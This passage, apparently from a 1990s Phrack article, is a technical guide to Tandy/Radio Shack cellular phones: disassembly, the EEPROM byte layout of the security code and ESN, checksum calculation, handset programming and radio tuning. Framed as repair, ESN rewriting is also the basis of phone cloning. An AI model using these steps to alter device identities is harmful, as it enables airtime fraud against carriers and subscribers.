  5051. 8-pin DIP integrated circuit.  One such inexpensive device is
  5052. listed in appendix III.
  5053.  
  5054. An individual who is familiar with the memory device involved has
  5055. written a software program in the BASIC language to allow the
  5056. programming of this chip via the parallel port of an
  5057. IBM-compatible personal computer.  The source code for this program
  5058. can be found in the appendix, and is provided as a reference only.  Such
  5059. software is subject to the peculiarities of the host PC and
  5060. therefore cannot be recommended for use in place of a standard PROM
  5061. programmer.  Older versions of GWBASIC are preferred to Microsoft's
  5062. current QBASIC interpreter.
  5063.  
  5064.                               MODELS COVERED
  5065.  
  5066. The information presented is believed to cover all of the installed
  5067. and transportable (bag phone) cellular transceivers manufactured
  5068. by the Tandy Corporation under license from the Nokia Corporation up
  5069. until about a year ago.
  5070.  
  5071. Tests have been conducted on a random selection of these phones
  5072. with manufacture dates ranging from 1989 through early 1994.  All
  5073. versions of the "TP" firmware through January, 1994 should be
  5074. supported.
  5075.  
  5076. Although no house-branded OEM Nokia transceivers have been
  5077. tested, we have surmised that this information is applicable to several
  5078. models based on the same or a similar design.  These models
  5079. include the Nokia LX-11, M-11, M-10 and the Nokia-Mobira P4000 (PT612). 
  5080. Some of these units, like the very old Radio Shack equivalents,
  5081. will require a service handset to program.  More on that in the
  5082. next issue of Phrack.
  5083.  
  5084.                               HAND-HELD UNITS
  5085.  
  5086. Only one of the hand-held cellular phones previously sold through
  5087. Radio Shack utilizes a discrete surface-mounted integrated
  5088. circuit to store the ESN and NAM parameters.  If you have the capability
  5089. to read and program this SOIC 93C46 memory device you may be able to
  5090. extrapolate the PROM dumps in this guide to work with this phone.
  5091.  
  5092. Due to the difficulty in disassembling this unit and the delicate
  5093. nature of the surface-mounted EEPROM, the reader is cautioned
  5094. against attempting to service these in-house.
  5095.  
  5096.                                 DISASSEMBLY
  5097.  
  5098. Prior to disassembling the transceiver, all antenna and cables,
  5099. including the handset, should be disconnected from the jacks on
  5100. the unit.
  5101.  
  5102. To aid in disassembly and component location, the original
  5103. hard-copy version of this publication contained several pages of
  5104. photographs.  While the hard-copy version is available (see end of
  5105. article), you will hopefully be able to figure out what we're talking about
  5106. without them.
  5107.  
  5108. Disassembly begins by snapping the plastic end panel from the
  5109. black transceiver cover.  Some units just pop up and off, while others
  5110. have two small plastic tabs on each side that must be depressed
  5111. free the end panel for removal.
  5112.  
  5113. With the end panel removed, the top plastic cover is now free to
  5114. slide off.  With this cover removed, the metal transceiver itself
  5115. can be dumped from the remaining plastic housing by turning it
  5116. upside down, or pulling up on the metal heat sink assembly that
  5117. comprises one side of the transceiver unit.
  5118.  
  5119. There is a metal shield on each side of the transceiver (top and
  5120. bottom.)  One is a solid piece of thin sheet metal, and the other
  5121. is broken up in to smaller, individual shields and soldered to
  5122. the transceiver chassis.  The shield that needs to be removed is the
  5123. solid one.  It is only held in place with the friction grips
  5124. along the edges, and can be pried off with your fingers.
  5125.  
  5126. Once the shield is removed from the proper side of the
  5127. transceiver, the solder side of the logic board will be exposed.
  5128. This board must be removed to gain access to the component side.  Take
  5129. static precautions so as not to fry the CMOS silicon that is currently
  5130. hidden from view. 
  5131.  
  5132. Other than several connectors that mate between the two boards,
  5133. the board is usually held in place by several blobs of solder spaced
  5134. along the edge of the board.  These small 'solder welds' serve as
  5135. a ground bond between the board and the transceiver chassis, and
  5136. are not electrically necessary under normal circumstances.
  5137.  
  5138. Once the solder ground bonds have been melted and removed with a
  5139. de-soldering tool or solder wick, use a pair of needle-nose pliers
  5140. to gently bend back the small metal tabs holding the circuit
  5141. board in place.
  5142.  
  5143. Before proceeding, inspect the foil side of the board to ensure
  5144. that no solder has splashed on the board during de-soldering, and
  5145. that the foil traces where the work was performed are still
  5146. intact.  This last step is where most trouble arises.  These boards are
  5147. delicate, and a heavy hand while prying or bending will almost
  5148. ensure that a trace or five will be transected when the tool
  5149. slips.  If this happens, resolder the traces to undo the damage.
  5150.  
  5151. At this point the logic board is held in place only by pins on
  5152. the transceiver board sticking up in to sockets on the logic board. 
  5153. Gripping the edges of the logic board with your fingers and
  5154. pulling straight up will disengage the connectors and allow the logic
  5155. board to pull free of the transceiver.  Slightly rocking the board from
  5156. each side may aid in the removal.  Do not grip the board with
  5157. pliers or damage can result to the small chip resistors and other
  5158. components mounted on the solder side of the board.
  5159.  
  5160. Once dislodged, you'll have two separate circuit boards.   
  5161.  
  5162.                               THE LOGIC BOARD
  5163.  
  5164. The board that supplies logic and control functions for the
  5165. cellular mobile telephone is easily identifiable by the
  5166. microprocessor and 27C512 EPROM containing the operating
  5167. firmware.  The EPROM's erase window is covered by a protective sticker
  5168. that identifies the firmware version stored therein.  Within the last
  5169. few years, the version has ranged from TP-2 through TP-8.
  5170.  
  5171. Also on this board is the serial EEPROM where the ESN and NAM
  5172. parameters are stored.  This chip is an 8-pin DIP located in a
  5173. socket near pin #1 of the NEC microprocessor.  It is usually
  5174. covered with a small paper sticker bearing the last few digits of
  5175. the serial number stored inside.
  5176.  
  5177. While security experts may blast Nokia for designing a phone that
  5178. stores the ESN in a socketed chip, and then says "here I am" by
  5179. placing a sticker on it, this is a dream come true for any
  5180. technician facing issues of data corruption.  
  5181.  
  5182.                              THE SERIAL EEPROM
  5183.  
  5184. The Serial EEPROM containing all of this data is a PCD8572 (or
  5185. 85C72) manufactured by Microchip Technology, Inc.
  5186.  
  5187. This 8-pin device is a 1k (128x8) CMOS serial electrically
  5188. erasable PROM.  The pin configuration for the device can be found in the
  5189. appendix.
  5190.  
  5191. Power is supplied to this chip only when the microprocessor is
  5192. performing a read or write operation.  Transistor Q115 (surface
  5193. mounted to the underside of the logic board right about in the
  5194. middle) switches the supply voltage on and off.  Should power be
  5195. interrupted during the write cycle, the ESN may become corrupt.
  5196.  
  5197.                             REBUILDING THE ESN
  5198.  
  5199. To replace the damaged serial number, note the unit's serial
  5200. number from the cellular service agreement or the phone itself.
  5201. The ESN (in decimal) is located on a white paper sticker applied to the
  5202. side of the metal transceiver chassis.  It is also stamped into the
  5203. plastic model identification plate on one side of the plastic
  5204. outer housing.
  5205.  
  5206. For reprogramming, the ESN must be converted to hex.  A scientific
  5207. calculator or any number of public domain computer programs will
  5208. simplify the task.
  5209.  
  5210.                           CONTENTS OF NAM
  5211.  
  5212. Once the original serial number has been determined, carefully
  5213. remove the 8572 EEPROM from the socket and place it in the
  5214. adapter required by your PROM programmer.  Reading the contents of the
  5215. chip, you'll see data as depicted below.
  5216.  
  5217. Note that these data dumps are simulated for illustrative purposes.
  5218. The ESN and encoded MIN bytes are not legitimate numbers, so don't
  5219. bother 'testing' them.
  5220.  
  5221. The first five bytes of data contain the security code.  These
  5222. bytes are the hex values representing ASCII characters 0 through
  5223. 9, thus represented as "3X" where "X" is the actual digit of the
  5224. security code.  A factory security code of 1 2 3 4 5 would be
  5225. represented in bytes 00 through 04 as follows:
  5226.  
  5227. 31 32 33 34 35
  5228.  
  5229. Since you will require the security code to enter handset
  5230. programming mode, please note the current security code or
  5231. program these bytes with your shop's standard default.
  5232.  
  5233.                      UNDERSTANDING ADDRESSES
  5234.  
  5235. Some cellular technicians have little experience in the digital
  5236. world.  Service monitors and watt-meters are expensive and wonderful
  5237. devices, but sometimes you need to do a little more than tweak a pot
  5238. to fix a phone.  The digital-literate can skip this oversimplified
  5239. explanation.
  5240.  
  5241. To assist those in reading the locations of the various bytes in the EEPROM,
  5242. understand that each line (as usually displayed on a programmer) contains
  5243. sixteen (16) bytes.  The first line begins with byte 00, then 01, 02, 03,
  5244. 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E and finally 0F.
  5245.  
  5246. The second line begins with 10, then 11, 12, 13, 14, 15, 16, 17,
  5247. 18, 19, 1A, 1B, 1C, 1D, 1E, and 1F as the last byte of the line. 
  5248. The third line increments the same way, except as byte 30, 31,
  5249. etc., to 3F.  You now know how to count in base 16 (hex)! 
  5250.  
  5251. As an example, the locations used by the phone end at byte 3D,
  5252. which contains 00 in the example below.  Beginning with the next
  5253. byte (3E), a repetitive pattern of alternating values of AA and
  5254. 55 are stored.  This is just 'test' data and is never read by the
  5255. phone.  The chip itself ends at byte 7F, and your PROM programmer
  5256. may display FF following byte 7F to indicate the non-existence of
  5257. these locations in the chip.
  5258.  
  5259.    
  5260.                      8572 EXAMPLE DATA DUMP
  5261.  
  5262.  
  5263.           0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
  5264.           0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
  5265.           0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
  5266.           0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF 00 AA 55
  5267.           0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
  5268.           0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
  5269.           0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
  5270.           0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
  5271.  
  5272.  
  5273.                     THE CRUCIAL SERIAL NUMBER
  5274.  
  5275. The hex ESN for any given phone consists of four bytes, as we use
  5276. the term here.  Technically it is eight bytes (in hex, 32 bits if
  5277. expressed in binary form), but we're referring to a 'byte' as a two-digit
  5278. hex number, rather than each digit (byte) as a single entity.  For our
  5279. example, we're using the fictitious ESN of A521FF0A.  All Radio Shack
  5280. phones will have an ESN beginning with A5 hex.  This is the "manufacturers
  5281. code" prefix that has been assigned to Tandy.
  5282.  
  5283. Breaking the ESN into four bytes as viewed on the PROM programmer,
  5284. the ESN would appear as:
  5285.  
  5286.                           A5 21 FF 0A
  5287.  
  5288. Refer back to the example dump of the data within the 8572 IC. 
  5289. Immediately following the security code is the ESN stored in
  5290. reverse order.  With the security code occupying bytes 00 to 04,
  5291. the ESN is located in bytes 05, 06, 07 and 08.  Byte 09 contains
  5292. the value 38.  It should always contain 38.
  5293.  
  5294. In the example, beginning with byte 05 you can read the ESN (in
  5295. reverse sequence) as:
  5296.  
  5297.                          0A FF 21 A5
  5298.  
  5299. The examples below will assist you in visualizing the bytes
  5300. containing the security code and the electronic serial number. 
  5301. The programming and placement of these two crucial pieces of data is
  5302. fairly straight forward.  Using the buffer editor function of the
  5303. PROM programmer, you can simply type over the garbage that may be
  5304. present in these locations with the correct values for the
  5305. security code and the ESN.  Double check your data entry!
  5306.  
  5307.                       OTHER ADDRESSES
  5308.  
  5309. The entire NAM data is stored in the remaining locations of this
  5310. chip.  Bytes 0A, 0B and 0C contain the firmware revision date,
  5311. and bytes 0D - 0F contain the installation date as programmed via the
  5312. handset programming mode.
  5313.  
  5314. Other bytes contain the encoded Mobile Identification Number
  5315. (MIN), Station Class Mark (SCM), etc.
  5316.  
  5317. These various bytes do not need to be reprogrammed through your
  5318. PROM burner, as they can all be corrected via handset
  5319. programming.  Only the security code and ESN must be properly reprogrammed
  5320. directly to the chip itself.  For more information on the locations
  5321. of this other data, refer to the source code in Appendix A.  It
  5322. allows you to see where (and how) this other data is stored within
  5323. the NAM.
  5324.  
  5325. The last item to program is the checksum.
  5326.  
  5327.  
  5328. THE SECURITY CODE:  BYTES 00 - 04
  5329.  
  5330.           0000 31 32 33 34 35 XX XX XX XX XX XX XX XX XX XX XX
  5331.  
  5332.      
  5333. THE ESN:  BYTES 05 - 08
  5334.  
  5335.           0000 XX XX XX XX XX 0A FF 21 A5 XX XX XX XX XX XX XX
  5336.  
  5337.  
  5338.                     LOCATING THE CHECKSUM
  5339.  
  5340. There is a one byte device checksum stored within the 8572 that
  5341. is used by the phone to check the integrity of the data stored
  5342. therein.  The checksum is located at byte 3D, indicated by "XX"
  5343. in the example below.
  5344.  
  5345. The checksum is derived from all the data stored in the NAM, not
  5346. just the ESN.  Computing it is relatively easy as it is simply
  5347. the sum (in hex) of all the values from bytes 00 through 3C as
  5348. underlined below.
  5349.  
  5350. Assuming the PROM programmer has a checksum function, you can
  5351. enter the beginning address as 0000 and the ending address as 003C. 
  5352. The software will add all of the values between these locations and
  5353. give you the sum.  The alternative is to add the numbers manually
  5354. using the hex mode of a scientific calculator.  Either way, adding
  5355. the hex values of all the bytes between 00 and 3C of our example yields
  5356. a sum of 0B5E.
  5357.  
  5358. The least significant two-digit byte is the actual device
  5359. checksum that would be programmed in location 3D.  In our example, the
  5360. least significant half is 5E.  Ignoring the most significant half of
  5361. the sum (0B), a value of 5E must be programmed to location 3D.
  5362.  
  5363. Note that the checksum will be recomputed and change after
  5364. handset programming.  When the MIN or other data is changed, it alters
  5365. the values in various bytes.  The checksum encompasses all of the
  5366. data stored within the chip used by the transceiver's firmware.
  5367.  
  5368.                           CHECKSUM LOCATION
  5369.  
  5370.           0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
  5371.           0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
  5372.           0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
  5373.           0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF XX AA 55
  5374.           0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
  5375.           0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
  5376.           0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
  5377.           0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
  5378.  
  5379.  
  5380.                    BYTES SUMMED TO DERIVE CHECKSUM
  5381.  
  5382.           0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
  5383.           0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
  5384.           0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
  5385.           0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF .. .. ..
  5386.           0040 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
  5387.           0050 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
  5388.           0060 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
  5389.           0070 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. 
  5390.  
  5391.                             DEFAULT VALUES
  5392.  
  5393. In the event that all of the data stored within the NAM becomes
  5394. corrupt, the technician will need to program the security code,
  5395. the ESN, and certain default data values to allow the phone to power
  5396. up.  Once powered up, all of the other data can be automatically
  5397. reconstructed by the phone using the handset programming mode.
  5398.  
  5399. Since the factory does not provide any information about the
  5400. contents of the 8572 EEPROM, we are unsure of the function of
  5401. this 'default data.'  It seems to have little significance.
  5402.  
  5403. The underlined bytes depicted below are fairly typical.  Ideally
  5404. the technician should compare the contents of an operational
  5405. phone with equivalent firmware to determine the values for the
  5406. underlined locations, but if this is not possible then the values
  5407. provided in the example may suffice.
  5408.  
  5409. Once these defaults have been programmed in the proper locations,
  5410. and the ESN and security code have been reconstructed, compute
  5411. the checksum and store it in address 3D. Temporarily reassemble the
  5412. phone and apply power.  The unit should power up and complete it's
  5413. self-test which will include the operation where the microprocessor
  5414. computes the NAM checksum and compares it to the value stored in
  5415. location 3D.
  5416.  
  5417. Assuming the self-diagnostics pass, the remaining data can now be
  5418. reconstructed through normal handset programming.
  5419.  
  5420. The handset programming template applicable to most of these
  5421. units is located immediately following the appendix detailing the chip
  5422. programming software included for reference purposes.  
  5423.  
  5424.  
  5425.                         DEFAULT DATA VALUES
  5426.  
  5427.           0000 XX XX XX XX XX XX XX XX XX 38 XX XX XX XX XX XX
  5428.           0010 00 00 00 00 XX XX XX XX XX XX XX XX XX XX XX XX
  5429.           0020 XX XX XX XX XX XX XX 00 27 00 01 01 11 11 11 11
  5430.           0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF XX AA 55
  5431.           0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
  5432.           0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
  5433.           0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
  5434.           0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
  5435.  
  5436.                          ADDITIONAL NOTES
  5437.  
  5438. As discussed, the parallel port programming software interface
  5439. has a few quirks, most involving the programming voltage supplied to
  5440. the chip.  If all else fails, and a PROM burner is not available,
  5441. take the supply voltage (Vcc) directly from the logic board.
  5442.  
  5443. Run test lead jumpers from pins #4 and #8 of the IC socket on the
  5444. logic board that held the 8572 EEPROM and connect to the
  5445. respective pins on the socket attached to the cable to be used for
  5446. programming.  Turn the board over and locate surface mount
  5447. transistor Q115 which switches the supply voltage to the IC
  5448. socket on and off.
  5449.  
  5450. This small chip transistor is directly to the left of pin #8 (of
  5451. the 8572 socket) and can be positively identified by the circuit
  5452. trace from socket pin #8 leading directly to the emitter of Q115.
  5453.  
  5454. By examining this area of the board, you can determine which of
  5455. the other two traces connects to the transistor's collector. 
  5456. Jumpering the traces and shorting the collector and emitter simply
  5457. provides a constant, conditioned voltage supply to the socket designed to
  5458. power the 8572 in programming mode.  It may also be necessary to cut the
  5459. trace to the base of Q115.
  5460.  
  5461. Once the chip has been programmed with the software, restore the
  5462. integrity of the cut trace to the base of Q115 and remove the
  5463. short between the collector and emitter.
  5464.  
  5465.                          USING THE SOFTWARE
  5466.  
  5467. The Cellular Data Repair Utility software requires that you first
  5468. create a small text file using an ASCII text editor such as DOS's
  5469. "EDIT" utility program.
  5470.  
  5471. This text file must contain the data described below in the
  5472. specific order presented.  The data in this image (.img) file
  5473. will be programmed into the 8572.
  5474.  
  5475. XXX       ESN Prefix (decimal)
  5476. XXXXXXXX  ESN (8 digits decimal)
  5477. XXXXX     SIDH (5 digits decimal)
  5478. 1         Access Bit
  5479. 1         Local Option Bit
  5480. AAAPPPXXXX       MIN (10 digits)
  5481. 08        SCM
  5482. 0XXX      (0333 or 0334)
  5483. 10        Access Overload Class
  5484. 1         Pref. System Bit
  5485. 10        GIM
  5486. 12345     Security Code
  5487.  
  5488.  
  5489. EXAMPLE IMAGE FILE
  5490. Filename:  TEST.IMG
  5491.  
  5492. 165
  5493. 00246812
  5494. 00031
  5495. 1
  5496. 1
  5497. 5105551212
  5498. 08
  5499. 0334
  5500. 10
  5501. 1
  5502. 10
  5503. 12345
  5504.  
  5505.  
  5506.                               PROGRAMMING
  5507.  
  5508. Once the image file containing the appropriate data has been
  5509. saved, run the software with QBASIC or Microsoft BASIC and follow the
  5510. prompts.  Be sure to set the proper parallel port address in line
  5511. 1950 to reflect the port to which the interface is connected
  5512. first.
  5513.  
  5514.                              TUNING STEPS
  5515.  
  5516. 1)   With a digital voltmeter attached to the positive terminal
  5517. of C908, adjust VR908 to provide a reading of 8 vdc (q 0.1 volt).
  5518.  
  5519. 2)   With the voltmeter attached to the positive terminal of
  5520. C913, adjust VR918 for a reading of 8 vdc (q 0.1 volt).
  5521.  
  5522. 3)   Connect the voltmeter to test point TXV and enter diagnostic
  5523. command 0, 1, SEL, 9, END.  Adjust C676 to achieve a reading of 5
  5524. vdc control voltage (q 0.1 volt).
  5525.  
  5526. 4)   Check receiver control voltage with test point RXV.  Adjust
  5527. C614 for a reading of 4 vdc (q 0.1 volt).
  5528.  
  5529. 5)   With  a power meter connected to the antenna connector of
  5530. the transceiver through an attenuator, enter command SEL, 1, 2, SND,
  5531. END to turn on the transmitter at high power.  VR814 should then
  5532. be adjusted to show 3 watts (34.8 dBm) on the power meter.
  5533.  
  5534. 6)   Using the same power meter, enter command SEL, 1, 3, 7, END.
  5535.  
  5536. Adjust VR846 for a low power maximum reading of 4 milliwatts (6
  5537. dBm).
  5538.  
  5539. 7)   Using a frequency counter to measure the output of the
  5540. antenna connector, adjust X600 for a reading of 836.4000 MHz (q 0.1 kHz).
  5541.  
  5542. 8)   Using a deviation meter, activate DTMF tones with command
  5543. SEL, 2, 1, END, 1, 1, END and adjust VR259 for 8.4 kHz q 0.1 kHz DTMF
  5544. deviation.
  5545.  
  5546. 9)   End DTMF signaling with command 1, 0, END.  Enable SAT
  5547. transmission by entering SEL, 2, 8, SND, END and adjust VR261 for
  5548. 7.8 kHz deviation (q 0.1 kHz).
  5549.  
  5550. 10)  Enter SND, END to discontinue SAT signaling.
  5551.  
  5552.  
  5553.                         ADDITIONAL ADJUSTMENT
  5554.  
  5555. The level of audio fed to the earphone via the "ear" line (pin #7
  5556. on the handset connector) can be adjusted via VR215.  1.2 Vrms is
  5557. the factory specified level with the volume turned up to it's
  5558. maximum setting.
  5559.  
  5560. Received audio signals can be adjusted for minimal distortion by
  5561. peaking L703.
  5562.  
  5563. Frequency deviation of voice audio can be fine tuned with VR260. 
  5564. Factory spec. is for 8 kHz deviation.
  5565.  
  5566.  
  5567.      POWER LOSS
  5568.  
  5569. If the transceiver refuses to even power up and begin self-diagnostics,
  5570. check the traces on the underside of the board near the power connector.
  5571.  
  5572. Most of these units 'protect' themselves against reverse polarity
  5573. being present on the power cables with fusible traces.  If the
  5574. phone is connected to a vehicle or battery power supply backwards,
  5575. one of these very small circuit traces will vaporize, leaving the
  5576. phone inoperative.
  5577.  
  5578. While inconvenient for the customer and service technician alike,
  5579. repairing the trace is an additional source of revenue for the
  5580. shop that might not be generated had a standard replaceable fuse or
  5581. rectifier been utilized in the design.
  5582.  
  5583.  
  5584.                              APPENDIX III
  5585.  
  5586.                          TECHNICAL RESOURCES
  5587.  
  5588.  
  5589.  
  5590.      EEPROM PROGRAMMER
  5591.  
  5592. In preparing this article and performing other research involving various
  5593. types of firmware, we used the EPROM+ programming system from Andromeda
  5594. Research.  This small, portable device is housed in a carrying case and
  5595. requires no internal card to operate with your PC.  Once the software is
  5596. installed on the computer, the EPROM+ programmer is simply plugged into an
  5597. available parallel printer port.
  5598.  
  5599. To program the PCD8572 series EEPROMs, a small adapter is required.
  5600.  
  5601. You can construct this yourself from the included instructions,
  5602. or purchase it already built for about $35 extra.
  5603.  
  5604. The EPROM+ programming system is available for $289 from the
  5605. manufacturer:
  5606.  
  5607.      Andromeda Research
  5608.      P.O. Box 222
  5609.      Milford, Ohio 45150
  5610.      (513) 831-9708 - voice
  5611.      (513) 831-7562 - fax
  5612.  
  5613.  
  5614.      SERVICE MANUALS
  5615.  
  5616. Service manuals are available for most Radio Shack or Tandy products from
  5617. Tandy National Parts.  Ordering these publications requires that you visit
  5618. your local Radio Shack store.  Tell the clerk that you want him (or her)
  5619. to call National Parts and order a service manual for catalog number....
  5620.  
  5621. National Parts no longer accepts calls from consumers and will only
  5622. ship to a recognized Radio Shack retail outlet.
  5623.  
  5624.      NOKIA - MOBIRA
  5625.  
  5626. Service handsets, manuals and other parts can be ordered from
  5627. Nokia-Mobira in Largo, Florida.  Their toll-free technical
  5628. assistance number is (800) 666-5553.
  5629.  
  5630.      TANDY FAX-BACK SERVICE
  5631.  
  5632. Tandy Support Services offers technical information via fax-back
  5633. server.  There is no mention that the service is restricted to
  5634. Radio Shack stores.  Although ANI can be hell, the toll-free number
  5635. is (800) 323-6586 if you want to be faxed product info on assorted 'Shack
  5636. products.  The server makes neat video game noises, and thanks you for
  5637. using the service.
  5638.  
  5639. For an index of the cellular specification sheets available via
  5640. fax-back, request document #8882.
  5641.  
  5642. Programming instructions are also available from this automated
  5643. fax server:
  5644.  
  5645. DOCUMENT #     PHONE MODEL
  5646.  
  5647. 9009           Current List [index] 
  5648. 8728           CT-105, 1050, 1055
  5649. 9004           CT-350
  5650. 9005           CT-302
  5651. 9006           CT-102, 103, 104, 1030, 1033
  5652. 9007           CT-300, 301
  5653. 9008           CT-100, 101, 200, 201
  5654. 9020           CT-351
  5655. 9665           BC901ST         [170-1015]
  5656. 9579           CP-1700         [170-1016]
  5657. 9577           CP-4600/5600    [170-1067 / 170-1056]
  5658. 14493          Ericsson AH-210 [170-1064]
  5659. 9581           EZ-400          [170-1057]
  5660. 9743           Motorola 12822  [170-1058]
  5661. 9583           Motorola DPC550 [170-1059]
  5662.  
  5663. This information provided for reference purposes only.  Use of
  5664. this fax-back service may be restricted to authorized personnel.  No
  5665. one has ever faxed me to complain, however. 
  5666.  
  5667.                        THE INTERFACE
  5668.  
  5669. The uuencoded drawing which accompanies this article describes the
  5670. interface required to use the programming software to rebuild the data
  5671. stored within the serial EEPROM.  Because there are a number of variables
  5672. that can affect the performance of this software and interface, prepare
  5673. yourself for a bit of trial and error.  A standard programming device is
  5674. recommended over the use of this software.  Since the original publication
  5675. of this manual in hard-copy, we've heard reports that the software does not
  5676. work well with the PCD8572, but does favor the PCD85C72 (CMOS version).
  5677.  
  5678. The DB-25 connector is wired to an 8-pin DIP socket to accommodate the 8572
  5679. integrated circuit.  A regulated, well-filtered source of 5 volts must be
  5680. connected to pin #8 of the DIP socket, and Pin #4 must be tied to ground.
  5681. If the PC used for programming and the power source to the IC socket share
  5682. a common ground, you may be able to use pin #25 of the parallel port connector
  5683. as shown in the diagram.
  5684.  
  5685. Please be careful not to cause any shorts in this instance or you
  5686. may damage your computer by sinking too much current through the
  5687. parallel port.  If you are unsure of what you are doing, eliminate
  5688. the connection between pin #4 of the IC socket and pin #25 of the
  5689. DB-25 connector.  Instead, connect pin #4 directly to ground.
  5690.  
  5691. The resistor shown in the circuit is used as an optional voltage
  5692. divider.  Depending on the voltage provided by pin #2 of your
  5693. parallel port, a resistor between 100 and 1k ohms may be required
  5694. to drop it to a level within the nominal range required by the
  5695. EEPROM. 
  5696.  
  5697.                        TUNING THE RADIO
  5698.  
  5699. The diagrams in the uuencoded .zip file will assist in identifying and
  5700. locating the various adjustment points on the logic board and transceiver (RF)
  5701. PC board.  Alignment should not be attempted by technicians unfamiliar with
  5702. the principles involved, or in the absence of calibrated radio frequency
  5703. measurement equipment.
  5704.  
  5705. A diagnostic (service) handset may be required to access
  5706. service-level commands within the transceiver.  If the phone does
  5707. not respond properly to the commands documented herein, you'll
  5708. need to obtain a service handset from Tandy National Parts.  This
  5709. handset is actually a Nokia "programming handset" which can be
  5710. obtained directly from the factory.
  5711.  
  5712.                        PROGRAMMING TEMPLATE
  5713.  
  5714.           For Tandy / Radio Shack Cellular Mobile Telephones
  5715.                  Models CT-102, 302, 1030, 1033, etc.
  5716.  
  5717.  
  5718.  
  5719. 1)   Power up phone.  After the phone cycles through it's
  5720. self-test mode and the display clears, enter the following keystrokes from
  5721. the keypad:
  5722.  
  5723.      *, 3, 0, 0, 1, #, X, X, X, X, X, SEL, 9, END
  5724.  
  5725. The X, X, X, X, X represents the five-digit security code stored
  5726. in EEPROM.  The factory default is 1, 2, 3, 4, 5.  This security
  5727. code is required to access handset programming mode.
  5728.  
  5729. 2)   The display will now read:    IdEnt IF InFO Pri
  5730.  
  5731. 3)   Press END to program NAM 1.  Display will show first
  5732. programming step.
  5733.  
  5734. 4)   To program NAM 2, press SND twice instead of END.  Display
  5735. will cycle through:       OPt InFO diSAbLEd  then OPt InFO EnAbLEd
  5736.      
  5737. 5)   Use the END key to step through each step.  The SND key
  5738. toggles the state of single-digit options.  To enter new
  5739. information, use END to step through the display until the old
  5740. data is displayed.  Key in the new data and press END to increment to
  5741. the next step.
  5742.  
  5743. 6)   When programming has been completed, press SEL, CLR to save
  5744. changes.
  5745.  
  5746.  
  5747. Step #    Desired Input  Display   Data Description
  5748.  
  5749. 01        5 digits       HO-Id     SIDH (Home System Identification)
  5750. 02        0 or 1         MIN Mark  MIN Mark (Toggle with SND)
  5751. 03        0 or 1         LOCL OPt  Local Use Mark (Toggle with SND)
  5752. 04        10 digits      Phon      MIN (Area Code + Mobile Number)
  5753. 05        08             St CLASS  SCM (Station Class Mark)
  5754. 06        333 or 334     PAging Ch IPCH (Initial Paging Channel)
  5755. 07        2 digits       O-LOAd CL Access Overload Class
  5756. 08        A or B         PrEF SyS  Preferred System (Toggle with SND)
  5757. 09        2 digits       grOUP Id  GIM Mark (Set to 10 in U.S.)
  5758. 10        5 digits       SECUrity  Security Code
  5759. 11        -------        1 dAtE    Firmware Date - not changeable
  5760. 12        mmddyy         2 dAtE    Installation Date
  5761.  
  5762. Press SEL, CLR to save & exit.  Turn Power off and back on for
  5763. model CT-302.
  5764.  
  5765.  
  5766. [Begin Editorial]
  5767.  
  5768. --------------------------------------------------------------------------
  5769. HOW TO OBTAIN A HARD-COPY VERSION OF THIS FILE - WITH ALL PHOTOS:
  5770. --------------------------------------------------------------------------
  5771.  
  5772. "The Complete Guide to Tandy / Radio Shack Cellular Hardware" is available
  5773. for $15 prepaid.  We keep $5 of the price to cover the cost of printing
  5774. and the Priority mail postage.  The remaining $10 of the purchase price will
  5775. be donated to Boston's The L0pht to help them cover the cost of upgrading
  5776. their Internet connection for l0pht.com....
  5777.  
  5778. The guys at the L0pht have always been cool with us, and maintain what
  5779. amounts to one of the best cellular archives accessible on the 'net.  We
  5780. want to do what we can to assist them in providing this public source of
  5781. enlightenment.  Now you can help them, and get something for it in return.
  5782. If nothing else, you can sit back and enjoy all my great close-up photos
  5783. of the chips <g>!
  5784.  
  5785.                                             -- Damien Thorn
  5786.  
  5787. Here's the address:
  5788.  
  5789. Phoenix Rising Communications
  5790. 3422 W. Hammer Lane, Suite C-110
  5791. Stockton, California 95219
  5792.  
  5793. [end editorial]
  5794.  
  5795. -----------------------------------------------------------------------------
  5796. You can reach me via e-mail at:  damien@prcomm.com
  5797. -----------------------------------------------------------------------------
  5798.  
  5799.  
  5800.  
  5801. 1000 ' CELLULAR DATA REPAIR UTILITY
  5802. 1005 ' Form image and program PCD8572 IC via LPT port.
  5803. 1010 ' (c) 1993, 1994, 1995 WarpCoreBreachGroup - All rights reserved.
  5804. 1015 ' 
  5805. 1020 ' This program is not shareware/freeware.
  5806. 1025 '
